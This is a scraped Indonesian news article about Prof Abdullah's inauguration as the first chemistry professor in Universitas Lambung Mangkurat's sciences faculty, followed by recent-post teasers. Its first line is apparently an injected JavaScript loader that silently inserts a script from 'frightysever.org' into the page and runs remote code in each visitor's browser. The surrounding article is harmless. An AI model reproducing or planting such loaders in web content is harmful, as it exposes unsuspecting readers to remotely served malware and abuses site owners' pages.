(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Pendidikan

Prof Abdullah, Guru Besar Pertama di Fakultas MIPA ULM Banjarbaru


BANJARMASIN, Fakultas MIPA Universitas Lambung Mangkurat (ULM) memiliki guru besar pertamanya. Adalah Prof Dr Abdullah Ssi, Msi, yang dikukuhkan sebagai guru besar bidang ilmu kimia oleh Rektor ULM Prof Dr Sutarto Hadi, Msi, MSc di aula rektorat, Selasa (10/7) pagi.

Dikukuhkannya Prof Abdullah sebagai guru besar juga berbarengan dengan ditetapkannya Prof Dr Ir H Syarifudin Kadir MSi sebagai guru besar di Fakultas Kehutanan.

Dalam sambutannya, Sutarto Hadi mengatakan bahwa Profesor Abdullah merupakan guru besar pertama yang ada di Fakultas MIPA. “Prof Abdullah ini merupakan Guru besar pertama di Fakultas MIPA. Karya dan penelitian beliau sudah banyak dipublikasikan di jurnal internasional dan memiliki hak paten di Kemenkumham RI,” katanya.

Sutarto mengatakan, dengan dikukuhkannya dua orang guru besar hari ini, maka saat ini tinggal satu fakultas yang belum mempunyai guru besar. “Hanya Fakultas Kedokteran Gigi yang belum punya guru besar. Hal ini kerena merupakan fakultas yang termuda di ULM saat ini,” jelasnya.

Sementara itu, dalam pidato pengukuhannya yang dihadiri oleh senat universitas, civitas akademika ULM, dan para undangan lainnya, Prof Abdullah menyampaikan orasi dengan judul: Peran Strategis Ilmi Kimia di Berbagai Sektor Kehidupan.

Dalam paparannya Prof Abdullah mengatakan, seiring perkembangan ilmu pengetahuan dan tuntutan akan aspek kimia di berbagai bidang telah memunculkan berbagai disiplin baru. Seperti munculnya Biokimia, Kimia Lingkungan, Kimia Polimer, Kimia Katalis, Kimia Farmasi, Kimia Pangan, Geo Kimia, Kimia Komputasi, Kimia Forensik, Kimia Pertanian, dan lainnya.

“Ini menunjukkan bahwa ilmu kimia memiliki irisan yang luas dengan berbagai ilmu di bidang sains lainnya,” terangnya.

Dengan demikian, lanjut Prof Abdullah, seluruh sendi kehidupan tak terlepas dari aspek kimia. Karena itu tak mengherankan, jika ilmu kimia merasuk dalam hampir semua bidang seperti pangan, pertanian, perikanan, kehutanan, kesehatan, energi, ekonomi, hingga aspek hukum dan pertahanan.

“Di sektor pertanian misalnya, terkait penyediaan pupuk, ilmu kimia memegang peranan penting. Baik pupuk buatan maupun pupuk kimia, semua melibatkan reaksi kimia dalam pembuatannya,” tegasnya.

Yang lebih menjadi sorotan dalam paparannya, Prof Abdullah menekankan pentingnya peran kimia pada sektor energi. Mengingat berkaitan dengan hal ini, pemerintah melalui Dewan Energi Nasional (DEN) maupun Komisi VII DPR RI telah menyepakati rancangan kebijakan enrego nasional untuk penyediaan energi nasional hingga 2050. Penyediaan energi ini mengacu pada Energi Baru dan Terbarukan (ETB), bauran energi, pengelolaan batubara, gas bumi, dan pengurangan subsidi energi.

“Salah satu sumber energi baru dan terbarukan (EBT) dengan potensi besar di negara kita adalah biomassa. Sumber energi ini merupakan sumber daya alam yang jumlahnya melimpah. Diperoleh dari hasil perkebunan, pertanian, hingga limbah yang dihasilkan keduanya. Biomassa sebagai energi bisa berupa biobriket, briket arang, bioetanol, biodesel, biogas dan lainya,” jelasnya.(cel)

Reporter: Cel
Editor: Chell

Desy Arfianty

Recent Posts

DPRD Banjarbaru Target Tiga Raperda Inisiatif Selesai Dalam Tiga Bulan

KANALKALIMANTAN.COM, BANJARBARU - Tiga buah Rancangan Peraturan Daerah (Raperda) inisiatif ditargetkan selesai dalam waktu tiga… Read More

34 menit ago

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

5 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

7 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

7 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

8 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

8 jam ago

This website uses cookies.